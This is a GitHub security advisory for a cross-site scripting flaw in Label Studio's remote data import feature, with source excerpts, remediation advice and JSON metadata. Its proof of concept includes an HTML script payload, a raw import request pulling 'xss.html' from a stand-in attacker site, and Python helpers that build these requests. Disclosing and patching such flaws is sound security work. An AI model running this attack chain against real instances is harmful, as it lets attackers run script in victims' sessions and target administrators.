GHSA-FQ23-G58M-799R
Vulnerability from github – Published: 2024-01-24 14:21 – Updated: 2024-11-22 18:20
Introduction
This write-up describes a vulnerability found in Label Studio, a popular open source data labeling tool. The vulnerability affects all versions of Label Studio prior to 1.10.1 and was tested on version 1.9.2.post0.
Overview
Label Studio had a remote import feature that allowed users to import data from a remote web source; the data was downloaded and could then be viewed on the website. This feature could have been abused to download an HTML file that executed malicious JavaScript code in the context of the Label Studio website.
Description
The following code snippet in Label Studio shows that if a URL passed the SSRF verification checks, the contents of the file were downloaded and stored under the file name taken from the URL.
def tasks_from_url(file_upload_ids, project, user, url, could_be_tasks_list):
    """Download file using URL and read tasks from it"""
    # process URL with tasks
    try:
        filename = url.rsplit('/', 1)[-1]  # <1>
        response = ssrf_safe_get(
            url, verify=project.organization.should_verify_ssl_certs(), stream=True, headers={'Accept-Encoding': None}
        )
        file_content = response.content
        check_tasks_max_file_size(int(response.headers['content-length']))
        file_upload = create_file_upload(user, project, SimpleUploadedFile(filename, file_content))
        if file_upload.format_could_be_tasks_list:
            could_be_tasks_list = True
        file_upload_ids.append(file_upload.id)
        tasks, found_formats, data_keys = FileUpload.load_tasks_from_uploaded_files(project, file_upload_ids)
    except ValidationError as e:
        raise e
    except Exception as e:
        raise ValidationError(str(e))
    return data_keys, found_formats, tasks, file_upload_ids, could_be_tasks_list
- The file name was taken from the portion of the URL after its last '/'.
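To make the file name derivation concrete, the sketch below isolates the `url.rsplit('/', 1)[-1]` expression from `tasks_from_url` in a helper. The helper name `filename_from_url` and the `evil.example` URLs are illustrative assumptions and are not part of Label Studio.

```python
def filename_from_url(url: str) -> str:
    """Hypothetical helper mirroring the expression in tasks_from_url:
    keep everything after the last '/' in the URL string."""
    return url.rsplit('/', 1)[-1]


# The remote side fully controls the resulting name, including its extension.
print(filename_from_url('https://evil.example/xss.html'))          # xss.html
print(filename_from_url('https://evil.example/files/tasks.json'))  # tasks.json

# The expression works on the raw string, not on a parsed URL path,
# so a '/' inside the query string also decides the name.
print(filename_from_url('https://evil.example/a.json?x=/b.html'))  # b.html
```

Because the name is taken from the string as supplied, whoever provides the URL also chooses the extension under which the file is stored.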
The downloaded file path could then be retrieved by sending a request to /api/projects/{project_id}/file-uploads?ids=[{download_id}] where {project_id} was the ID of the project and {download_id} was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, the following code snippet demonstrated that the Content-Type of the response was determined by the file extension, since mimetypes.guess_type guesses the Content-Type based on the file extension.
class UploadedFileResponse(generics.RetrieveAPIView):
    permission_classes = (IsAuthenticated,)

    @swagger_auto_schema(auto_schema=None)
    def get(self, *args, **kwargs):
        request = self.request
        filename = kwargs['filename']
        # XXX needed, on windows os.path.join generates '\' which breaks FileUpload
        file = settings.UPLOAD_DIR + ('/' if not settings.UPLOAD_DIR.endswith('/') else '') + filename
        logger.debug(f'Fetch uploaded file by user {request.user} => {file}')
        file_upload = FileUpload.objects.filter(file=file).last()
        if not file_upload.has_permission(request.user):
            return Response(status=status.HTTP_403_FORBIDDEN)
        file = file_upload.file
        if file.storage.exists(file.name):
            content_type, encoding = mimetypes.guess_type(str(file.name))  # <1>
            content_type = content_type or 'application/octet-stream'
            return RangedFileResponse(request, file.open(mode='rb'), content_type=content_type)
        else:
            return Response(status=status.HTTP_404_NOT_FOUND)
- Determines the Content-Type based on the extension of the uploaded file by using mimetypes.guess_type.
Since the Content-Type was determined by the file extension of the downloaded file, an attacker could import a .html file that would execute JavaScript when visited.
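The extension-to-Content-Type mapping can be checked with the standard library alone. The following is a minimal sketch that reuses the same `mimetypes.guess_type` call and `application/octet-stream` fallback as the view; the function name `served_content_type` and the sample file names other than `cfcfc340-xss.html` are assumptions made for illustration.

```python
import mimetypes


def served_content_type(stored_name: str) -> str:
    """Hypothetical helper reproducing the view's logic: guess the type
    from the extension, fall back to a generic binary type."""
    content_type, _encoding = mimetypes.guess_type(stored_name)
    return content_type or 'application/octet-stream'


# An imported .html file is served as HTML, so a browser renders it
# and runs any script it contains.
print(served_content_type('upload/1/cfcfc340-xss.html'))  # text/html

# Typical task files map to non-executable types.
print(served_content_type('upload/1/tasks.json'))         # application/json

# Extensions that are not recognised fall back to the binary default.
print(served_content_type('upload/1/data.zzzunknownext'))
```

Nothing in this path inspects the file contents, which is why the extension chosen by the attacker is enough to obtain a `text/html` response.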
Proof of Concept
Below are the steps to reproduce this issue:
- Host the following HTML proof of concept (POC) script on an external website with the file extension .html, so that it can be downloaded to the Label Studio website.
<html>
<body>
<h1>Data Import XSS</h1>
<script>
alert(document.domain);
</script>
</body>
</html>
- Send the following POST request to download the HTML POC to Label Studio and note the ID of the downloaded file returned in the response. In the following POC, {victim_host} is the address and port of the victim Label Studio website (e.g. labelstudio.com:8080), {project_id} is the ID of the project that the data would be imported into, {cookies} are session cookies and {evil_site} is the website hosting the malicious HTML file (named xss.html in the following example).
POST /api/projects/{project_id}/import?commit_to_project=false HTTP/1.1
Host: {victim_host}
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 43
Connection: close
Cookie: {cookies}
Pragma: no-cache
Cache-Control: no-cache

url=https://{evil_site}/xss.html
- Retrieve the downloaded file path by sending a GET request to /api/projects/{project_id}/file-uploads?ids=[{download_id}], where {download_id} is the ID of the file downloaded in the previous step.
- Send your victim a link to /data/{file_path}, where {file_path} is the path of the downloaded file from the previous step. The following screenshot demonstrates the POC JavaScript code executing when visiting /data/upload/1/cfcfc340-xss.html.
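For checking whether your own pre-1.10.1 test instance is affected, the requests in the steps above can be assembled with the standard library. This is a rough sketch that only builds the objects and sends nothing. The function names, the `http://` scheme, and the sample host, cookie and payload values are assumptions. The body is percent-encoded by `urlencode`, which differs textually from the raw body in the advisory but decodes to the same `url` form field.

```python
from urllib.parse import urlencode
from urllib.request import Request


def build_import_request(victim_host, project_id, cookies, payload_url):
    """Build (but do not send) the POST request from the import step."""
    body = urlencode({'url': payload_url}).encode('ascii')
    return Request(
        # Assumption: plain HTTP; use https:// if the instance requires it.
        url=f'http://{victim_host}/api/projects/{project_id}/import?commit_to_project=false',
        data=body,
        method='POST',
        headers={
            'Content-Type': 'application/x-www-form-urlencoded',
            'Cookie': cookies,
        },
    )


def file_uploads_path(project_id, download_id):
    """Path queried to look up where the downloaded file was stored."""
    return f'/api/projects/{project_id}/file-uploads?ids=[{download_id}]'


def served_file_path(file_path):
    """Path under which the stored file is served back to a browser."""
    return f'/data/{file_path}'


req = build_import_request('localhost:8080', 1, 'sessionid=example', 'https://evil.example/xss.html')
print(req.get_method(), req.full_url)
print(req.data)
print(file_uploads_path(1, 7))
print(served_file_path('upload/1/cfcfc340-xss.html'))
```

When sent through `urllib.request.urlopen`, the Content-Length header is computed from `req.data`, so the fixed value of 43 in the raw request does not need to be reproduced by hand.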

Impact
Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the link to the imported HTML file. For example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the link.
Remediation Advice
- For all user provided files that are downloaded by Label Studio, set the Content-Security-Policy: sandbox; response header when viewed on the site. The sandbox directive restricts a page's actions to prevent popups, execution of plugins and scripts and enforces a same-origin policy (documentation).
- Restrict the allowed file extensions that could be downloaded.
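Both recommendations can be sketched independently of any web framework. The example below is an illustration under stated assumptions, not the fix that shipped in Label Studio 1.10.1: the helper names and the contents of `ALLOWED_EXTENSIONS` are hypothetical, and a real deployment would attach the returned headers to its own response object.

```python
import mimetypes
from pathlib import PurePosixPath

# Hypothetical allowlist; the advisory does not specify which extensions to permit.
ALLOWED_EXTENSIONS = {'.json', '.csv', '.tsv', '.txt', '.jpg', '.jpeg', '.png', '.wav', '.mp3'}


def is_allowed_upload(filename: str) -> bool:
    """Accept a file only if its (case-insensitive) extension is allowlisted."""
    return PurePosixPath(filename).suffix.lower() in ALLOWED_EXTENSIONS


def hardened_headers(stored_name: str) -> dict:
    """Headers for serving a user provided file, with the sandbox policy added."""
    content_type, _encoding = mimetypes.guess_type(stored_name)
    return {
        'Content-Type': content_type or 'application/octet-stream',
        # An empty sandbox directive applies all sandbox restrictions,
        # including blocking script execution in the served document.
        'Content-Security-Policy': 'sandbox;',
    }


print(is_allowed_upload('xss.html'))    # False
print(is_allowed_upload('tasks.JSON'))  # True
print(hardened_headers('upload/1/cfcfc340-xss.html'))
```

The two measures complement each other: the allowlist rejects unexpected file types at import time, while the header limits what a file that is stored anyway can do when it is opened in a browser.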
Discovered
- August 2023, Alex Brown, elttam
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "label-studio"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.10.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-23633"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2024-01-24T14:21:47Z",
"nvd_published_at": "2024-01-24T00:15:08Z",
"severity": "MODERATE"
},
"details": "# Introduction\n\nThis write-up describes a vulnerability found in [Label Studio](https://github.com/HumanSignal/label-studio), a popular open source data labeling tool. The vulnerability affects all versions of Label Studio prior to `1.10.1` and was tested on version `1.9.2.post0`.\n\n# Overview\n\n[Label Studio](https://github.com/HumanSignal/label-studio) had a remote import feature allowed users to import data from a remote web source, that was downloaded and could be viewed on the website. This feature could had been abused to download a HTML file that executed malicious JavaScript code in the context of the Label Studio website.\n\n# Description\n\nThe following [code snippet in Label Studio](https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146) showed that is a URL passed the SSRF verification checks, the contents of the file would be downloaded using the filename in the URL.\n\n```python\ndef tasks_from_url(file_upload_ids, project, user, url, could_be_tasks_list):\n \"\"\"Download file using URL and read tasks from it\"\"\"\n # process URL with tasks\n try:\n filename = url.rsplit(\u0027/\u0027, 1)[-1] \u003c1\u003e\n\n response = ssrf_safe_get(\n url, verify=project.organization.should_verify_ssl_certs(), stream=True, headers={\u0027Accept-Encoding\u0027: None}\n )\n file_content = response.content\n check_tasks_max_file_size(int(response.headers[\u0027content-length\u0027]))\n file_upload = create_file_upload(user, project, SimpleUploadedFile(filename, file_content))\n if file_upload.format_could_be_tasks_list:\n could_be_tasks_list = True\n file_upload_ids.append(file_upload.id)\n tasks, found_formats, data_keys = FileUpload.load_tasks_from_uploaded_files(project, file_upload_ids)\n\n except ValidationError as e:\n raise e\n except Exception as e:\n raise ValidationError(str(e))\n return data_keys, found_formats, tasks, file_upload_ids, could_be_tasks_list\n```\n1. 
The file name that was set was retrieved from the URL.\n\nThe downloaded file path could then be retrieved by sending a request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]` where `{project_id}` was the ID of the project and `{download_id}` was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, the [following code snippet](https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62) demonstrated that the `Content-Type` of the response was determined by the file extension, since `mimetypes.guess_type` guesses the `Content-Type` based on the file extension.\n\n```python\nclass UploadedFileResponse(generics.RetrieveAPIView):\n permission_classes = (IsAuthenticated,)\n\n @swagger_auto_schema(auto_schema=None)\n def get(self, *args, **kwargs):\n request = self.request\n filename = kwargs[\u0027filename\u0027]\n # XXX needed, on windows os.path.join generates \u0027\\\u0027 which breaks FileUpload\n file = settings.UPLOAD_DIR + (\u0027/\u0027 if not settings.UPLOAD_DIR.endswith(\u0027/\u0027) else \u0027\u0027) + filename\n logger.debug(f\u0027Fetch uploaded file by user {request.user} =\u003e {file}\u0027)\n file_upload = FileUpload.objects.filter(file=file).last()\n\n if not file_upload.has_permission(request.user):\n return Response(status=status.HTTP_403_FORBIDDEN)\n\n file = file_upload.file\n if file.storage.exists(file.name):\n content_type, encoding = mimetypes.guess_type(str(file.name)) \u003c1\u003e\n content_type = content_type or \u0027application/octet-stream\u0027\n return RangedFileResponse(request, file.open(mode=\u0027rb\u0027), content_type=content_type)\n else:\n return Response(status=status.HTTP_404_NOT_FOUND)\n```\n1. 
Determines the `Content-Type` based on the extension of the uploaded file by using `mimetypes.guess_type`.\n\nSince the `Content-Type` was determined by the file extension of the downloaded file, an attacker could import in a `.html` file that would execute JavaScript when visited.\n\n# Proof of Concept\n\nBelow were the steps to recreate this issue:\n\n1. Host the following HTML proof of concept (POC) script on an external website with the file extension `.html` that would be downloaded to the Label Studio website.\n\n```html\n\u003chtml\u003e\n \u003cbody\u003e\n \u003ch1\u003eData Import XSS\u003c/h1\u003e\n \u003cscript\u003e\n alert(document.domain);\n \u003c/script\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n```\n\n2. Send the following `POST` request to download the HTML POC to the Label Studio and note the returned ID of the downloaded file in the response. In the following POC the `{victim_host}` is the address and port of the victim Label Studio website (eg. `labelstudio.com:8080`), `{project_id}` is the ID of the project where the data would be imported into, `{cookies}` are session cookies and `{evil_site}` is the website hosting the malicious HTML file (named `xss.html` in the following example).\n\n```http\nPOST /api/projects/{project_id}/import?commit_to_project=false HTTP/1.1\nHost: {victim_host}\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\ncontent-type: application/x-www-form-urlencoded\nContent-Length: 43\nConnection: close\nCookie: {cookies}\nPragma: no-cache\nCache-Control: no-cache\n\nurl=https://{evil_site}/xss.html\n```\n\n3. To retrieve the downloaded file path could be retrieved by sending a `GET` request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]`, where `{download_id}` is the ID of the file download from the previous step.\n\n4. Send your victim a link to `/data/{file_path}`, where `{file_path}` is the path of the downloaded file from the previous step. 
The following screenshot demonstrated executing the POC JavaScript code by visiting `/data/upload/1/cfcfc340-xss.html`.\n\n\n\n# Impact\n\nExecuting arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image.\n\n# Remediation Advice\n\n* For all user provided files that are downloaded by Label Studio, set the `Content-Security-Policy: sandbox;` response header when viewed on the site. The `sandbox` directive restricts a page\u0027s actions to prevent popups, execution of plugins and scripts and enforces a `same-origin` policy ([documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox)).\n* Restrict the allowed file extensions that could be downloaded.\n\n# Discovered\n- August 2023, Alex Brown, elttam",
"id": "GHSA-fq23-g58m-799r",
"modified": "2024-11-22T18:20:58Z",
"published": "2024-01-24T14:21:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23633"
},
{
"type": "WEB",
"url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox"
},
{
"type": "PACKAGE",
"url": "https://github.com/HumanSignal/label-studio"
},
{
"type": "WEB",
"url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62"
},
{
"type": "WEB",
"url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/label-studio/PYSEC-2024-128.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Cross-site Scripting Vulnerability on Data Import"
}